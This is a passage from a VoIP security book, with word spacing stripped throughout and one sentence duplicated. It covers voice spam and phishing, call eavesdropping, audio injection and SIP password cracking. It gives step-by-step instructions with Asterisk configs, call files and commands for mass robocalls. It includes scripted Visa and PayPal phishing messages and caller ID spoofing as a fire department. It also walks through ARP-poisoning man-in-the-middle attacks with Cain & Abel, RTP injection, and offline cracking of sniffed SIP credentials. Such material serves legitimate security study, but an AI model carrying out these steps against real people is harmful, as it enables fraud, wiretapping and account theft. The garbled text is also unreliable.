executestothephonenumberlistedfortheaccountholder.Themessageusuallytellstheaccountholderthatsomeaberrantactivityhasbeendetectedandheshouldcallthecreditcardcompanyrightaway.However,anattackercancreateasimilarfrauddetectionvoicecallbutaskthepersontocallanumberofherchoice.Forexample,theattacker'sautomatedmessagecouldbe:"Hello,thisisanautomatedmessagefromVisaFraudDetectionServices.Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.Thismessagewillnowrepeat.Hello,thisisanautomatedmessagefromVisaFraudDetectionServices.Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.Thankyou."

ThefollowingsectionsshowafewwaystoperformSPIT.

SPITandtheCity

Theabilitytosendpre-recordedcallsoverVoIPisquiteeasy.WithVoIPinfrastructure,standardmessagingformatcanbeused.OpenPBXsystems,suchasAsterisk,canbeusedtoblastpre-recordedmessagestoindividualphonenumbersinmassquantity.Asteriskallowsuserstomakeasinglecallfileandsenditmanually.Thecallfilecanthenberepeatedlysenttoseveraldifferentphonenumbersoverashortperiodoftime.CompletethefollowingstepstosendspammessagesoverVoIPinfrastructure:

1. Recordthespammessage.Thiscanbeaccomplishedusingavarietyofmethods;forthisproofofconcept,wewilluseapre-recordedmessagein.mp3format.Usinganyvoicerecorder,recordthespammessageandsaveittoa.mp3file(e.g.,SPAM.mp3).

2. Afterthefilehasbeensaved,loadittothefollowingdirectoryonyourAsteriskserver:/var/lib/asterisk/mohmp3/SPAM.mp3.Ifyoudon'thavetimetorecordaspammessage,useanymusic.mp3fileforthisexample.

3. Createanextensionsequencetocallthetargetandplaythe.mp3filewhenthephoneisanswered.a. Edit/etc/asterisk/extensions.confbyaddingthefollowing

linesunderthetestrealm[test],whichwillcreateanextensionandreferencetheSPAM.mp3messagerecorded:

[test]exten=>s,1,Answerexten=>s,2,MP3Player(/var/lib/asterisk/mohmp3/SPAM.mp3)exten=>s,3,Hangup

4. Tocompletetheproofofconcept,wewillbeusingthefreeaccountcreatedearlierwithVoIPBuster.Pleasecompletethatsectionofthischapterbeforeproceedingtothenextstep.Insummary,besuretovisithttp://www.voipbuster.com/,createanaccount,andaddthefollowinginformationtoyoursip.conffile(whereUSERNAMEandPASSWORDaretheinformationyourprovidedtoVoIPBuster):

[voipbuster]type=peerhost=sip.voipbuster.comcontext=testusername=USERNAMEsecret=PASSWORD

5. Createthecallfileitself.Thecallfilewillbeusedtomanuallysendapre-recordedmessageusingAsterisk.a. Changedirectoriesto/var/spool/asterisk/tmp.b. Openatexteditor,suchasvi,andcreateacallfile

calledSPAM.Test.call.Thefirstlinewilllistthetargetedphonenumberto

sendyourspamto,whichisindicatedbythechannelinformation.ThechannelinformationwillusetheVoIPBusteraccountcreatedearlier.Forexample,thefirstlinewillbelistedasSIP/1-xxx-xxx-xxxx@voipbuster,wherexxx-xxx-xxxxshouldbereplacedbythe10-digitphonenumberofthetargetednumber(e.g.,SIP/14151182006@voipbuster).Ifthetargetedphoneis415.118.2006,thechannellinewilllooklikethefollowing:

Channel:SIP/14151182006@voipbuster

c. Addtherestoftheitemsbelow,whichincludethemaxretries,waittime,andpriority,tomakethecallfilework:

MaxRetries:5RetryTime:300WaitTime:45Context:testExtension:sPriority:1

6. Totestthecallfiletoensurethateverythingworked,restarttheAsteriskserver,whichensuresthattheupdatedextensions.conffilehasbeenloaded:

/etc/init.d/asterisk/restart

7. CopythenewlycreatedcallfiletoAsterisk'soutgoingfolder.Asteriskchecksthisfolderperiodicallytosendoutboundcalls.Withinafewmomentsofyourmovingthefile,Asteriskwillcall415.118.2006andplaythepre-recorded.mp3messagetotheuserwhensheanswersthephone:

mv/var/spool/asterisk/tmp/SPAM.Test.call/var/spool/asterisk/outgoing

Done!YouhavenowsenttheSPAM.mp3filetoyourtargeteduser.

Ifthecallwasmadesuccessfully,thentherealnastinesscanbegin.Asyoumayhavenoticed,thereisnothinguniqueabout

thecallfileexceptthephonenumberlistedonthefirstline.Asimplescriptcanbecreatedthatchangesthe10-digitphonenumberofthetargettoanyvaluethespammerwishes.Furthermore,thescriptcanbewritteninawaytocreateauniquecallfileforeachnumberbetween415.000.0000and415.999.9999.OncethesecallfileshavebeenmovedtotheoutgoingfolderandsentbyAsterisk,itcanthensendthepre-recordedSPAM.mp3filetoallthephonenumbersinSanFrancisco(415istheareacodeforSanFrancisco).Furthermore,theattackercouldusehisVoIPJetaccountinsteadofVoIPBusterandsettheCallerIDvaluetosomethingtrusted,suchasthelocalfiredepartmentnumber.Thiswouldmakethecallsappeartobeoriginatingfromatrustedsource,allowingthespammertoSPITonallthephonesinamajorcity.

LightweightSPITwithSkype/GoogleTalk

AnotherwaytoSPITonusersistouseSkype,GoogleTalk,orthehandfulofotherVoIPclientsthatsupportthevoicemailfeature.SkypeandGoogleTalkofferafeaturethatallowsavoicemailmessagetobesenttootherSkype/GoogleTalkusers.Similartosendingadvertisementemailtousers,thisfeaturecanbeabusedbySkype/GoogleTalkusers.Thefeatureallowsavoicemailtobesenttoanycontactinyourcontactlist.Unlikebulkemail,whichallowsasingleemailtobesenttoseveralthousandsusers,SkypeandGoogleTalkdonotsupportbulkvoicemail.Anattackerwouldhavetosendavoicemailtoeachtargetonebyone,thuslimitingthefeasibilityofthistypeofSPITactivitygiventhatvolumeisabigfactorwhenoneistryingtoadvertiseproductstousersviaspam.Regardless,toSPITonSkype/GoogleTalkusers,aphishercansendavoicemailthatsoundsasifitisfromalegitimatecreditcardcompany.Infact,withPayPalbeingahigh-profiletargetofemailphishers,andthefactthateBayownsbothPayPalandSkype,avoicemailfrom"PayPal"toaSkypeaccountcitingunauthorizedactivityandrequestingimmediateactionisprobablythenextwaveofattacks.AsampleSkypephish

attemptmayhavethefollowingspeech:"DearCustomer:Wehavenoticedunusualactivityinyouraccountandaskthatyoucall1.800.118.2006immediatelytoresolvethisissue.TheactivityinquestionseemstoabusingbothyourPayPalandeBayaccountsatthistime.Thankyou,PayPalTrustandSafety."

CarryoutthefollowingstepstocompleteaproofofconceptofSPITwithSkype:

1. DownloadSkypefromhttp://www.skype.com/orGoogleTalkfromhttp://www.google.com/talk/.

2. AcquireSkypeVoicemail,whichcanbepurchasedforUS$6.00,orGoogleTalkVoicemail,whichisfree.

3. OpenNotepadandcopythepreviousphishingtextintoanewfile.

4. OpenWindowsSoundRecorder(Start►Programs►Accessories►SoundRecorder).

5. OpenWindowsNarrator(Start►Programs►Accessibility►Narrator).

6. ClickSoundRecorder'sRecordbutton.7. WhenNarratorbeginstospeakwords,givetheNotepad

filethefocus.Thissteprecordsthephishingtextintoacomputervoice,mimickingtheautomatedcallsmadebycreditcardcompanies.

8. ClickSoundRecorder'sStopbuttonafterNarratorfinishesthephishingtext.SavethefileasSPIT.wav.

9. TouseSkypeand/orGoogleTalktoSPIT:a. Right-clicktheusertowhomyouwishtosendaSPIT

voicemail.b. Waitfortheuser'svoicemailboxtostartrecording.c. PlaytheSPIT.wavfilefromyourmachine.

Done!Youhavejustsentaspamvoicemailmailusing

Done!Youhavejustsentaspamvoicemailmailusingcomputer-automatedtexttoatargetedVoIPuser.Asyoumayhavenoticed,theexampleshowsanunsophisticatedmethodofspammingVoIPusers.Aswitheveryothersectionofthischapter,theproofofconceptistoshowhoweasilySPITcanbeperformed,butnottoshowtherecipefordisaster.ArealSPITmethodologywouldimprovethepreviousexamplebyusingabettercomputer-automatedvoice(suchasoneproducedbyAsteriskFestival)andsendingbulkvoicemailswithasingleaudiofile(usingscriptingorsomeotherautomateddeliverymethod).

SummaryAsyouhavenodoubtnoticedfromthischapter,manyunconventionalattacksarepossiblewithVoIPinfrastructure.Thedescriptionsofmanyoftheseattacksinthischapterhaveshownthemostseverecases,whichallowanyusertodownloadtheAsteriskPBXsystemandwithinafewmomentsplaygamesontrusteddevicesinourhomesandoffices(landlinesandmobilephones,aswellasVoIPphones).VoIPtechnologyhasalongwaytogointermsoftrustboundariesandsecurityguarantees,becauseabuseofthesystemisnotactivelydefendedagainstorsecured.Historytellsusthatwhenabuseisallowedandcanleadtofinancialgain,suchaswithemailtechnologies,attackerswillnothesitatetotakeadvantageoftheopportunity.Unfortunatelyfortherestofus,thetrustofitemsweoncefeltverysecureaboutcannolongerbeguaranteed,whetherthatistheCallerID,anaccountrepresentativefromyourcreditcardcompany,orsimplyavoicemail.

Chapter8.HOMEVOIPSOLUTIONSHomeVoIPsolutionshavebeengainingpopularityformanyyears.FromearlysolutionslikeNet2PhonetothepopularityofPC-basedVoIPsolutionslikeSkypeandallthewaytotraditionalphonesusingVoIPsolutionslikeVonage,homeVoIPuseisontherise.WhiletheInternethasallowedtelephonecallsoverIPprotocolsformanyyears,notuntilabout2005didweseeatruefootholdinthehomemarket.ManyaspectsofVoIPsolutionsappealtothehomeuser,includingtherisingcostoftraditionalhomephones,thegrowingdisuseoflandlinesinfavorofmobilephones,andthe"geek"factorofbeingabletousethecomputerforeverything,includingmakinginexpensivetelephonecallstofriendsandfamily.WhileVoIPathomeisacheap,fun,andeasy-to-usemethodforplacingtelephonecalls,itcomeswithafewdisadvantages.Forexample,ifyourhomevoicesolutionisPC-based,apoweroutagecanleaveyouwithoutaphone(becauseyoucan'tconnecttotheserviceswithoutelectricitytopoweracomputer).Furthermore,traditional911servicesmaynotbeavailablewithmanyPC-basedVoIPclients,suchasSkype,Yahoo!,andGoogle,becausemanyVoIPsolutionscannotprovideacaller'sphysicaladdress,whichisarequirementfortheuseof911calls.Callqualitycanalsobeanissueattimes.WhilesomeVoIPserviceshavehighquality,thetechnologyisstillprettyinconsistent.Forexample,Skype'scallqualityhasimproved,buttheservicestillleavesmuchtobedesiredintermsofconsistentqualityoneverycall.Thefinaldisadvantage,whichismostpertinenttothischapter,istherelativelackofsecurity.Whilelandlinesarenotcheap,cooltouse,orflexible,theyprovidealayerofintrinsicsecurityandtrust.Landlinesecurityisbeyondthescopeofthischapter,butnoonecandisputethatmostusersplaceaconsiderableamountoftrustinlandlinecallsfromthecasualattacker.Peopleprobablyexpectthegovernmenttobeabletotaptheir

phonelines,buttheydonotexpectthatany15-year-oldontheInternetwillbeabletodoso,whichiswhereVoIPaddsdanger.Bythispointinthebook,though,youshouldbewellawarethatsecurityandtrustareVoIP'sprimaryliabilities,andthesameproblemsapplytohomeVoIPsolutions.ThischapterevaluatesthesecurityofhomeVoIPsolutions,includingcommercialVoIPsolutions,PC-basedVoIPsolutions,andsmalloffice/homeoffice(SOHO)phonesolutions.Thefollowinglistdescribestheproductscoveredineachcategory:

CommercialVoIPsolutions

VonagePC-basedVoIPsolutions

Yahoo!MessengerGoogleTalkMicrosoftLiveMessengerSkype

SOHOphonesolutions

ProductsfromcompanieslikeLinksys,Netgear,andD-Link

Itshouldbenotedthatmanyoftheprotocolsusedbycommercial,PC-based,and/orSOHOVoIPsolutionshavebeenalreadydiscussedinthisbook,specificallyintheSIPandRTPchapters(ChaptersChapter2andChapter4,respectively).AllattacksshownintheSIPandRTPchaptersapplytoeachVoIPproductthatusesthoseprotocols,regardlessofwhetheritisYahoo!MessengerorVonage.Whilethischapterwillnotnecessarilyreiterateinformationprovidedinpreviouschapters,we'llbespecificallydiscussingthesecuritystrengthsandweaknessesofeachhomeVoIPsolution,andthefamiliarmaterialwillhelptoprovidecontext.

CommercialVoIPSolutions

CommercialVoIPsolutionshavebeengrowingrapidlyoverthepastseveralyears,withcompanieslikeVonageprovidingcustomerswithtraditionalphoneservicesovertheInternet.UnlikePC-to-PCcallingorthehybridsolutions(PC/hardphone),VonagedoesnotrequireanysoftwareonaPCforthesystemtorun.WhileVonageuserscanmakeuseofoptionalsoftware,thesystemrequiresonlyabasestationthatconnectstoahometelephonejackandanEthernetcable.Infact,homeuserscanusetheirexistingPSTNphones(publicswitchedtelephonenetwork,whichisatraditionallandline)withtheVonagesolution,requiringnohardVoIPdevice.WhileVonageandotherprovidersofferalowerpackagepriceforhomephoneservicesthantraditionaltelephonecompanies,thesecurityoftheVonageVoIPcallmustbeconsidered.EventhoughtraditionalPSTNlandlinesdonotnecessarilysecureauser'stelephonecall,[12]onestillassumesacertainamountoftrustwhenusingahomephone.ThesecurityimplicationsofVonagearenodifferentfromthoseassociatedwithpreviouslydescribedinsecureprotocols,suchasSIPandRTP,buttheattackprocessisslightlychanged.

Vonage

AccordingtoVonage'swebsite,VoIPcallsusingtheVonageservicearesecure.Infact,thecompanystatesthataVonagecallisactuallymoresecurethanacallmadeviaatraditionalPSTNline.[13]Thecompanycontinuestostatethatanattackercannotsimplysniffthewireorredirectaconversationelsewhere.Theseareveryboldsecuritystatementsthatrequiresignifcantsupport,solet'sseeiftheyaretrue.AtypicalVonagearchitecturesetupisshowninFigure8-1.

Figure8-1.VonageVoIPsetup

Unfortunately,VonageisnotmoresecurethanPSTNlinesandisvulnerabletoseveralVoIPsecurityattacks.Specifically,everyattackdiscussedintheSIPandRTPchapterscanbeappliedtoVonage.ItisquitesurprisingtoseeVonagemakesuchboldsecuritypromiseswithsolittleevidencetobackthemup.BothsessionsetupviaSIPandmediatransferviaRTParewideopentoattacks.InVonage'sdefense,attacksfromtheInternethaveasmallattacksurface.Figure8-2showsthreemainattacksurfacesofVonage.

Figure8-2.AttackingaVonageVoIPnetwork

InordertofurtherdefineVonage'sattacksurface,thefollowinglistdescribestheprobabilitiesofeachattack.Probabilityhereismeasuredintermsofthelikelihoodthatanattackwouldbesuccessfulinthegivenenvironment.HighprobabilityInternalattackerswhohaveaccesstoauser'shome(e.g.,spouse,child,parent,roommate,roommate'sboyfriendorgirlfriend)MediumprobabilityVonagesystemsconnectedtohomewirelessnetworksthatareaccessibletoneighborsandwardriversLowprobabilityExternalattackerswhoareabletosniffthenetworkinthecorrectsegmentWhileinternalattackersmaybeastrongtermforafamilymemberorroommate,mostindividualsmakeoccasionalcallsthataspouse,child,parent,orroommateshouldnotbelisteningto.Whetherthecallhastodowithasurprisepartyforarelative,asecretthatneedstobehiddenfromone'sparents,oraroommate'sorderingpizzaandgivingacreditcardnumber,somethingsjustrequireprivacy.Thewirelessattacksurfaceisprobablyabiggerconcern,

becausemanypeopleusewirelesshubsfromLinksys,Netgear,andD-Linkintheirhomes.Whiletheconvenienceofwirelessnetworkingisgreat,thesecurityprotectionsonhomewirelessdevicesareterrible.Mosthomewirelessnetworksaresetupverypoorlyintermsofsecurity.Forexample,asmallnumberofhomeusersdeploywirelessdeviceswithnoencryption,allowingattackersintheneighborhoodtoconnectandseealltrafficthatissentincleartext.SomeusersenableWiredEquivalentPrivacy(WEP)encryptionontheirwirelessdevices,butanattackercancrackWEPinabout30minutesorless.Anewersolution,Wi-FiProtectedAccess(WPA),isbeingusedmoreandmoretoreplaceWEP,butofflinedictionaryattacksonWPAcanbeperformedquiteeasilywithtoolslikeCain&Abel.Theuseofeitheroftheseformsofencryptionallowsanexternalattacker,suchasaneighbororevenanywardriverwithastrongwirelessantenna,tosniffthetrafficandeavesdroponauser'sVoIPcalls.Thefinalscenarioistheonewiththemostdifficultattacksurface,butitshouldstillbetakenintoconsiderationwhenaddressingsecurity.BecauseVonagetrafficissentincleartext,anymalicioususerontheDSL/cablesegmentcansniffthetrafficandviewthecallinformation.AnattackerinRussiawhoistargetingauserinCaliforniawillhaveatoughtimetargetingthespecificnetworksegment;however,anattackerwhousesthesamebroadbandproviderasanotherVonageusercouldsniffthesegmenteasily.Furthermore,limitedaccesstothenetworksegmentdefinitelyreducestheattacksurface,andengaginginvoicecommunicationthattraversesthenetworkincleartextisnotagoodpolicy.Asananalogy,mostInternetuserswouldnotpurchaseanitemonlineunlessencryption(SSL)werebeingperformedbythewebbrowser.Usersaretrainedtolookforthesecuritylockontheirwebbrowser(orthepresenceofanhttpsinsteadofanhttpinthebrowser'saddressbar)toassurethemthatanytransactionorcommunicationbetweenthemandAmazon,eBay,PayPal,ortheirbank'swebsiteis100percentencryptedandthussecure.However,aVonageuserwhogiveshiscreditcardnumberover

thephonetopayforapizzahasjustsentallthatcreditcardinformationovertheInternetincleartext,whichistheequivalentofmakingacreditcardpaymentinthewebbrowserwithoutthereassuranceofSSL.Inordertoshowthesecurityissuesfirst-hand,thenextsectionwillshowhowanattackerwouldperformSIPandRTPattacksonaVoIPsolutionthatusesVonage.ManyoftheseattackshavealreadybeenexplainedintheSIPandRTPchaptersbutwillbecustomizedheretoapplyspecificallytoaVonageenvironment.Furthermore,onlySIP/RTPdemonstrationsthatattackahomeuser'snetworkorequipmentwillbeshown,asattackinganyVonageinfrastructureisillegal.ThefollowingattackscanbeinitiatedonanyoftheattacksurfacesshowninFigure8-2:

Calleavesdropping(RTP)Voiceinjection(RTP)Username/passwordretrieval(SIP)

CallEavesdropping(RTP)

RTPisacleartextprotocol,whichmeansitcanbesniffedoverthenetworklikeothercleartextprotocolssuchastelnet,FTP,andHTTP.WhilesniffingRTPpacketsisaseasyassniffingtelnetpackets,gettingusefulinformationisnotquiteassimple.VoiceconversationsusingRTPconsistofacollectionofaudiopackets,witheachpacketcontainingacertainpartoftheaudiocommunicationfromoneendpointtotheother.CapturingasingleRTPpacketwillgivetheattackeronlyasingleaudiosliceofalongerconversation.AneasywaytosolvethisissuewithoutaddingmorecomplexityistouseatoollikeCain&AbelorWireshark.Thesetools,aswellasothers,cancaptureasequenceofRTPpackets,reassembletheminthecorrectorder,andsavetheRTPstreamasanaudiofile(e.g.,a.wavfile)usingthecorrectaudiocodec.Inthisway,anypassiveattackercansimplypoint,click,and

eavesdroponalmostanyVoIPcommunication.Performingaman-in-the-middleattackhelpsensurethesuccessofVoIPeavesdropping,becauseitforcestargetstosendtheirpacketsthroughanattackeronthelocalsubnet.Forexample,let'ssaytwotrustedparties,SoniaandKusum,wanttocommunicateviatelephone.InordertocommunicatewithKusum,Soniadialsherphonenumber.WhenKusumanswersthephone,SoniabeginshercommunicationprocesswithKusum.Duringaman-in-the-middleattack,anattackerinterceptstheconnectionbetweenSoniaandKusumandactsasarouterfortheconnection.Thisforcesthetwoendpointstoroutethroughanunauthorizedthirdparty.BothKusumandSoniacanstillcommunicate;however,neitherofthemwillbeawarethatanunauthorizedthirdpartyislisteningtoeverywordoftheirconversation.Theattackislikehavingathree-wayphonecallinwhichtwoofthethreecallersareunawareofthepresenceofthethirdparty.Figure8-3showsahigh-levelexampleofaman-in-the-middleattack.

Figure8-3.Man-in-the-middleattack

Note✎

Formoreinformationonman-in-the-middleattacks,refertoChapter4.

InordertocaptureVonageRTPpackets,reassemblethem,anddecodethemto.wavfilesusingthecorrectcodec,allthewhileperformingaman-in-the-middleattack,anattackermightusetheverypopulartoolCain&Abel.Tocarryoutaman-in-the-middleattackaccordingtoFigure8-3withCain&Abel,anattackerwouldperformthefollowingsteps:

1. DownloadCain&Abel,writtenbyMassimilianoMontoro,fromhttp://www.oxid.it/cain.html/.

2. Installtheprogramusingitsdefaults.InstalltheWinPCappacketdriveraswellifoneisnotalreadyinstalled.

3. LaunchCain&Abel(Start►Programs►Cain).4. Clickthegreeniconintheupperleft-handcornerthat

lookslikeanetworkinterfacecard.TheattackerwillwanttocheckthatherNICcardhasbeenidentifiedandenabledcorrectlybyCain&Abel.

5. SelecttheSniffertab.6. Clickthe+symbolonthetoolbar.TheMACAddress

Scannerwindowwillappear.ThiswillenumeratealltheMACaddressesonthelocalsubnet.

7. ClickOK.SeeFigure8-4fortheresults.

Figure8-4.MACAddressScannerresults

8. SelecttheAPRtabonthebottomofthetooltoswitchtotheARPPollutionRoutinginterface.

9. Clickthe+symbolonthetoolbartoshowalltheIPaddressesandtheirMACs.SeeFigure8-5.

Figure8-5.IPaddressesandtheirMACs

10. Ontheleft-handsideofthedialogshowninFigure8-5,choosethetargetfortheman-in-the-middleattack.Mostlikelythiswillbethedefaultgatewayintheattacker'ssubnetsoallpacketswillgothroughherfirstbeforetherealgatewayofthesubnet.

11. Oncetheattackerhaschosenhertarget,whichisthegatewayIPaddress172.16.1.1inourexample,sheselectstheVoIPendpointsontherightsidethatshewantstointercepttrafficfrom,suchastheVonagebasestation.IfshedoesnotknowwhichIPaddressistheVonagedevice,shesimplyselectsalltheIPaddressesontheright-handside.Figure8-6showsmoredetail.

Figure8-6.Man-in-the-middletargets

12. Selecttheyellow-and-blackicon(thesecondonefromtheleftonthemenubar)toofficiallystarttheman-in-the-middleattack.TheuntrustedthirdpartywillstartsendingoutARPresponsesonthenetworksubnet,whichwilltell172.16.1.119thattheMACaddressof172.16.1.1hasbeenupdatedto00-00-86-59-C8-94.(SeeFigure8-7.)

Figure8-7.Man-in-the-middleattackinprocesswithARPpoisoning

Atthispoint,alltrafficonthelocalnetworkisgoingtotheuntrustedthirdpartyfirstandthenonitsappropriateroute.TheattackercanthenuseCain&Abel,whichprovidesaVoIPsniffer,tocaptureRTPpacketsandreassembletheminto.wavfilesthatcanbeopenedwithWindowsMediaPlayer.

13. OnceaVonageuserplacesaphonecall,completethefollowingstepstoviewthecapturedaudioinformation:a. SelecttheSniffertabonthetoprowb. Onthebottomrow,selectVoIP.IfVoIPcommunication

hasoccurredonthenetworkusingRTPmediastreams,Cain&AbelwillautomaticallysavetheRTPpackets,reassemblethem,andsavethemin.wavformat.AsshowninFigure8-8,Cain&Abelhascapturedafewphoneconversationsoverthenetworkusingafewsimplesteps.

Usingaman-in-the-middleattackandCain&Abel'sdefaultVoIPsniffer,anattackercaneasilycapture,decode,andrecord

allthevoicecommunicationonaVonagenetwork.

Figure8-8.CapturedVoIPcommunicationviaRTPpackets

VoiceInjection(RTP)

RTPisthemedialayerusedbyVonage.InadditiontoweaknessesthatallowVoIPeavesdropping,RTPisalsovulnerabletoinjectionattacks.InjectionattacksallowmaliciousentitiestoinjectaudiointoexistingVoIPtelephonecalls.Forexample,anattackercouldinjectanaudiofilethatsays"Sellat118"betweentwostockbrokersdiscussinginsidertradinginformation.ToinjectaudiobetweentwoVoIPendpoints,RTPpacketsthatmirrortimestamp,sequence,andSSRCinformationoftherealRTPpacketsmustbeused.Forexample,inagivenRTPsession,thetimestampusuallystartswith0andincrementsbythelengthofthecodeccontent(e.g.,160ms),thesequencestartswith0andincrementsby1,andtheSSRCisusuallyastaticvalueforthesessionandafunctionoftime.Allthreeofthesevaluesareeitherpredictableinnatureorstatic.Theabilitytogatherthecorrecttimestamp,sequence,andSSRCinformationcanbequiteeasybecausealloftheinformationtraversesthenetworkincleartext.Anattackercansimplysniffthenetwork,readtherequiredinformationforhisattack,andinjecthisnewaudiopackets.Furthermore,becausetheinformationisnotrandom,atoolhasbeenwritten(describedinthissection)toautomatetheprocessandrequirelittleeffortfromtheattacker.Figure8-9showsanexampleoftheRTP

injectionprocess.

Figure8-9.RTPinjection

Noticethattheattacker'sSSRCnumberisthesameasitstarget's,butitssequencenumberandtimestampareinsyncwiththelegitimatesession(increasingaccordingly).Thismakestheendpointassumethattheattacker'spacketsarepartoftherealsession.InordertoinjectaudiointoVoIPnetworksthatuseRTP,anattackershoulduseRTPInject,atoolthatautomatestheactionsneededtoinjectpacketsintoanexistingaudiostream.Itautomaticallymakestheappropriatechangestothetimestamp,sequence,andSSRCvaluesonbehalfoftheuser.Theonlyrequirementistheaudiofiletobeinjected;however,RTPInjectcomeswithanexampleaudiofilebydefault(forproofofconceptpurposes).InordertoinjectaudiointoanexistingVoIPcall,anattackerwouldcompletethefollowingsteps:

1. DownloadRTPInject,writtenbyZaneLackeyandAlexGarbutt,fromhttp://www.isecpartners.com/tools.html/.FollowtheReadme.txtfileforusageonaWindowsmachine.TheLinuxversionofRTPInjectdependsonthefollowingpackages,whicharepre-installedonmostmodernLinuxsystems,suchasUbuntu,RedHat,andtheBackTrackLive

CD(youmustalwaysrunitwithrootprivileges):Python2.4orhigherGTK2.8orhigherPyGTK2.8orhigher

2. InstallthepypcaplibraryincludedwithRTPInjectbyusingthefollowingcommands:

bash#tarzxvfpypcap-1.1.tar.gzbash#cdpypcap-1.1bash#makeallbash#makeinstall(*Note:Thisstepmustbeperformedasroot.)

3. InstallthedpktlibraryincludedwithRTPInjectbyusingthefollowingcommands:

bash#tarzxvfdpkt-1.6.tar.gzbash#cddpkt-1.6bash#makeinstall

4. Performaman-in-the-middleattackonthenetwork(ifnecessary)usingdsniff(Linux)orCain&Abel(Windows),asdescribedearlierinthischapter,inordertocaptureallRTPstreamsinthelocalsubnet.

5. LaunchRTPInjectusingthefollowingcommand:bash#pythonrtpinject.py

OnceRTPInjectisloaded,itwillshowthreefieldsinitsprimaryscreen,includingtheSourcefield,theDestinationfield,andtheVoiceCodecfield.SeeFigure8-10.TheSourcefieldwillbeauto-populatedasRTPInjectsniffsRTPstreamsonthenetwork.

6. WhenanewIPaddressappearsintheSourcefield,clickit;itwillthenshowthedestinationVoIPphoneandthevoicecodecbeingusedinthestream.

Figure8-10.RTPInjectmainwindow

7. BecauseRTPInjectdisplaysthevoicecodecinuse,theattackercancreatetheaudiofilewiththepropercodecshewishestoinject.UsingWindowsSoundRecorderorSoxforLinux,createanaudiofileinthefileformatshownbyRTPInject,suchasA-Law,u-Law,GSM,G.723,PCM,PCMA,and/orPCMU.a. OpenWindowsSoundRecorder(Start►Programs►

Accessories►Entertainment►SoundRecorder).b. ClicktheRecordbutton,recordtheaudiofile,andthen

clicktheStopbutton.c. SelectFile►SaveAs.d. SelectChange.UnderFormat,selectthecodecthatwas

displayedinRTPInject.SeeFigure8-11.(BothWindowsSoundRecorderandLinuxSoxaudioutilitiesprovidetheabilitytotranscodeanysourceaudiotoanothertype.)

Figure8-11.WindowsSoundRecordercodec

e. ClickOKandthenselectSave.8. OncethisaudiofilehasbeencreatedusingWindowsSound

RecorderorSox,clickthefolderbuttononRTPInjectandnavigatetothelocationofthefilerecordedinstep6(depictedinFigure8-12).

Figure8-12.Selectdialog

9. WiththeRTPstreamandaudiofileselected,clicktheInjectbutton.RTPInjecttheninjectstheselectedaudiofileintothedestinationhostintheRTPstream,asshowninFigure8-13.

Figure8-13.InjectingaudiowithRTPInject

Username/PasswordRetrieval(SIP)

VonageusesSIPforsessionsetup.InorderforausertoplaceaphonecallonVonage,hisbasestationmustauthenticateappropriately.AsnotedinChapter2,SIPusesdigestauthentication,whichisvulnerabletoabasicofflinedictionaryattack.Inordertoperformanofflinedictionaryattack,theattackerneedstosnifftheusername,realm,Method,URI,nonce,andtheMD5responsehashoverthenetwork,allofwhichisavailabletoheroverthenetworkincleartext.Oncethisinformationhasbeenobtained,theattackertakesadictionarylistofpasswordsandinsertseachoneintothepreviousequations,alongwithalltheothercaptureditems.Oncethishasbeendone,theattackerwillhavealltheinformationsheneedstoperformtheofflinedictionaryattackwithease.Theinformationtoperformanofflinedictionaryattackisavailabletoapassiveattackerfromtwopackets:thechallengepacketfromtheSIPserverandtheresponsepacketbythe

UserAgent.ThepacketfromtheSIPserverwillcontainthechallengeandrealmincleartext,whilethepacketfromtheUserAgentwillcontaintheusername,method,andURIincleartext.Atthispoint,anattackercanthentakeapasswordfromherdictionary,concatenateitwiththeusernameandrealmvalues,andcreatethefirstMD5hashvalue.Next,theattackercantaketheMethodandURIsniffedoverthenetworkinordertocreatethesecondMD5hashvalue.Oncethetwohasheshavebeengenerated,theattackerwillthenconcatenatethefirstMD5,thenoncesniffedoverthenetwork,andthesecondMD5hashvalueandcreatethefinalResponseMD5value.IfthisresultingMD5hashvaluematchestheResponseMD5hashvaluesniffedoverthenetwork,thentheattackerknowsthatshehasbrute-forcedthecorrectpassword.IftheMD5hashvaluesdonotmatch,thentheattackermustrepeattheprocesswithanewpassworduntilshereceivesahashvaluethatmatchestheonethatwascapturedoverthenetwork.Unlikeanonlinebrute-forceattack,wheretheattackermayhaveonlythreeattemptsbeforealockout,theattackercanperformtheofflinetestforanindefinitenumberoftimesuntilshehascrackedthepassword.Foradeeperunderstandingoftheauthentication,refertoChapter2.Inordertoacquireauser'sVonageSIPpasswordusingCain&AbelandSIP.Tastic,anattackerwouldperformthefollowingsteps:

1. Repeatsteps1through13from"CallEavesdropping(RTP)"onCallEavesdropping(RTP).

2. OnceaVonageuserplacesaphonecall,completethefollowingstepstofindandsnifftherequiredinformationinordertobrute-forcethepassword:a. SelecttheSniffertabonthetoprow.b. SelectthePasswordstabonthebottomrow.c. HighlightSIPontheleftpane,asshowninFigure8-14.

Figure8-14.CapturedSIPinformation

3. NowthattherequiredSIPauthenticationinformationhasbeencapturedoverthenetwork,downloadSIP.Tastic(SIP.Tastic.exe)fromhttp://www.isecpartners.com/tools.html/.

4. LaunchSIP.TasticfromtheStartmenu(Start►Programs►iSECPartners►SIP.Tastic►SIP.Tastic).

5. EnterintothetooltheSIPinformationthathasbeensniffedfromCain&AbelinFigure8-14:

Dictionaryfile:isec.dict.txtUsername:16505871532Realm:69.59.242.86Method:REGISTERURI:sip:f:voncp.com:10000Nonce:230948039MD5ResponseHashValue:b56ce72431cdff8d6e6539afecac522c

Ifthepasswordislistedinthedictionaryfile,thetoolwillshowtherevealedpasswordwithinafewminutes,asshowninFigure8-15.

[12]Recalltheeventsof2006,whenlargeorganizationslikeQwestandAT&TgavethousandsofphonerecordstogovernmentagenciesliketheNationalSecurityAgency.[13]Seehttp://www.vonage.com/help.php?article=1033&category=127&nav=102&refer_id=OLNSRCH170307/

PC-BasedVoIPSolutionsPC-basedVoIPsolutionshavebeenanemergingtrendoverthepastseveralyears.AsPC-basedVoIPsolutionshavebecomeeasiertodevelopandmorepopular,almosteveryonlinecompanyhasshippedapeer-to-peerVoIPclient.LargeorganizationsincludingGoogle,Microsoft,Yahoo!,EarthLink,andevenNero,whichmakesCD/DVDburningsoftware,haveallreleasedVoIPclientsforthePC.ThissectionwilldiscussthesecurityofthemostpopularPC-basedVoIPsolutions.

Figure8-15.CrackedVonagepasswordusingSIP.Tastic

Yahoo!Messenger

